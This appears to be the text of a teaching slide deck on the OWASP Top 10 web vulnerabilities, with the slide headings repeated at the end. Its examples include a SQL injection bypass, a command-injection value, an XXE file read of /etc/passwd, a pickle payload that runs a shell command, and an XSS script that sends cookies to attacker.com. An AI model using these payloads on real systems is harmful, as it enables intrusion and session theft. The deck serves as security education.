OWASP Top 10

Tadas Malinauskas

Open

OWASP?

Web

Application

Security

Project

Projects

OWASP Broken Web Applications Project
OWASP Oracle Project
OWASP AJAX Security Project

OWASP TOP Ten

1. Injections

SQL injection
NoSQL injection
OS injection
Command injection
LDAP injection
XPATH Injection
...

Injections

SQL injection

Injections

SQL injection

Injections

SQL injection

uName = getRequestString("username");
uPass = getRequestString("userpassword");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

Injections

SQL injection

uName = getRequestString("username");
uPass = getRequestString("userpassword");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""

Injections

OS injection

public class DoStuff {
public string executeCommand(String userName)
{	try {
		String myUid = userName;
		Runtime rt = Runtime.getRuntime();
                // Call exe with userID
		rt.exec("doStuff.sh " +”-“ +myUid);
	}catch(Exception e)
		{
e.printStackTrace();
		}
	}
}

myUid = "datboi; netstat -a"

2. Broken Authentication

Timeouts
Plain text passwords
No session IDs rotation
Sessions IDs sent over unencrypted connections
Exposed Session ID (in URL, cookies etc.)

Exposed Session ID

http://example.com/sale/saleitems;sessionid=268544541&dest=Hawaii

 http://website.kom/<script>document.cookie=”sessionid=abcd”;</script>

3. Sensitive Data Exposure

Plain text information exchange
Weak crypto algorithms

4. XML External Entities

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

<!ENTITY xxe SYSTEM "file:///dev/random" >]>

5. Broken Access Control

http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo

http://example.com/app/accountInfo?acct=notmyacc

Replaying JWT tokens

6. Security Misconfiguration

Available directories listings
Detailed error messages
Exposed filesystem paths in error messages
SQL error messages containing queries

SQL error messages containing queries

7. Cross-Site Scripting

(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";

request.getParameter("CC") = ><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>

8. Insecure Deserialization

Dealing with untrusted sources
No integrity checks
No monitoring

import pickle
# This will run ls ~
pickle.loads("cos\nsystem\n(S'ls ~'\ntR.")

9. Using Components with Known Vulnerabilities

https://www.exploit-db.com

Unsupported components
Out of date components

10. Insufficient Logging & Monitoring

Unclear or no warning and error messages

OWASP Top 10

OWASP?

Web

Application

Security

Project

Projects

OWASP Broken Web Applications Project

OWASP Oracle Project

OWASP AJAX Security Project

OWASP TOP Ten

1. Injections

SQL injection

NoSQL injection

OS injection

Command injection

LDAP injection

XPATH Injection

...

Injections

SQL injection

Injections

SQL injection

Injections

SQL injection

Injections

SQL injection

Injections

OS injection

2. Broken Authentication

Timeouts

Plain text passwords

No session IDs rotation

Sessions IDs sent over unencrypted connections

Exposed Session ID (in URL, cookies etc.)

Exposed Session ID

3. Sensitive Data Exposure

Plain text information exchange

Weak crypto algorithms

4. XML External Entities

5. Broken Access Control

Replaying JWT tokens

6. Security Misconfiguration

Available directories listings

Detailed error messages

Exposed filesystem paths in error messages

SQL error messages containing queries

SQL error messages containing queries

7. Cross-Site Scripting

8. Insecure Deserialization

Dealing with untrusted sources

No integrity checks

No monitoring

9. Using Components with Known Vulnerabilities

https://www.exploit-db.com

Unsupported components

Out of date components

10. Insufficient Logging & Monitoring

Unclear or no warning and error messages

Questions?